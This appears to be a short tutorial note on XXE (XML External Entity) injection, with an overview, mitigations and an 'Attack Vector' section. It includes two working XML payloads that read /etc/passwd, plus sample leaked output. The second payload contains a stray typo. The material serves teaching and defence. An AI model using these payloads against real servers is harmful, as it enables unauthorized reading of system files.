### Overview
XXE (XML External Entity) injection is a type of security vulnerability that occurs when an application processes XML input in an insecure manner, allowing an attacker to include and process external entities. It can be a critical security flaw, especially in applications that deal with XML data and fail to properly validate and sanitize user-supplied XML input.

In XXE injection attacks, the attacker can exploit the ability to include external entities to read sensitive data from the server, perform Denial of Service (DoS) attacks, or even execute arbitrary code on the server. The vulnerability arises when the application parses XML input from untrusted sources without disabling external entity resolution.

#### Features
1. **Malicious XML Input:** The attacker crafts a malicious XML input, including an external entity declaration pointing to a sensitive file or resource on the server.
```xml
<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE data [   
	<!ENTITY sensitiveData SYSTEM "file:///etc/passwd"> 
]> 
<data>&sensitiveData;</data>
```
2. **XML Parsing:** The application parses the malicious XML input, including the external entity declaration.
3. **External Entity Inclusion:** The application processes the external entity reference and reads the content of the sensitive file (e.g., `/etc/passwd`) and includes it in the XML response.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<data>root:x:0:0:root:/root:/bin/bash...</data>
```
In this example, the attacker was able to read the `/etc/passwd` file using the XXE injection vulnerability, which could contain sensitive information like user account details.

#### Mitigation
1. **Disable External Entity Resolution:** Disable external entity resolution in XML parsers to prevent the processing of external entities in untrusted XML input.
2. **Input Validation and Sanitization:** Implement strict input validation and sanitization for all user-supplied XML input.
3. **Whitelisting Allowed Entities:** If external entities are required, use a whitelist approach to specify only allowed entities explicitly.
4. **Use Safe XML Parsers:** Utilize safe and secure XML parsers that disable external entity resolution by default.
5. **Use XML Security Libraries:** Consider using XML security libraries that provide protection against XXE injection attacks.
6. **Access Control and Least Privilege:** Ensure that the application running the XML parser has the least privilege necessary and access to sensitive files is restricted.
7. **User Input Encoding:** Encode user input properly when embedding it in XML to prevent injection.

### Attack Vector
1. **Create XML File Exploit**
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE creds [
<!ELEMENT creds ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>Muser>&xxe;</user><password>pass</password></creds>
```
2. **Upload the file to the target website**
- The external entity will target the external entity inside the creds document
- Then it will return the contents of the /etc/passwd file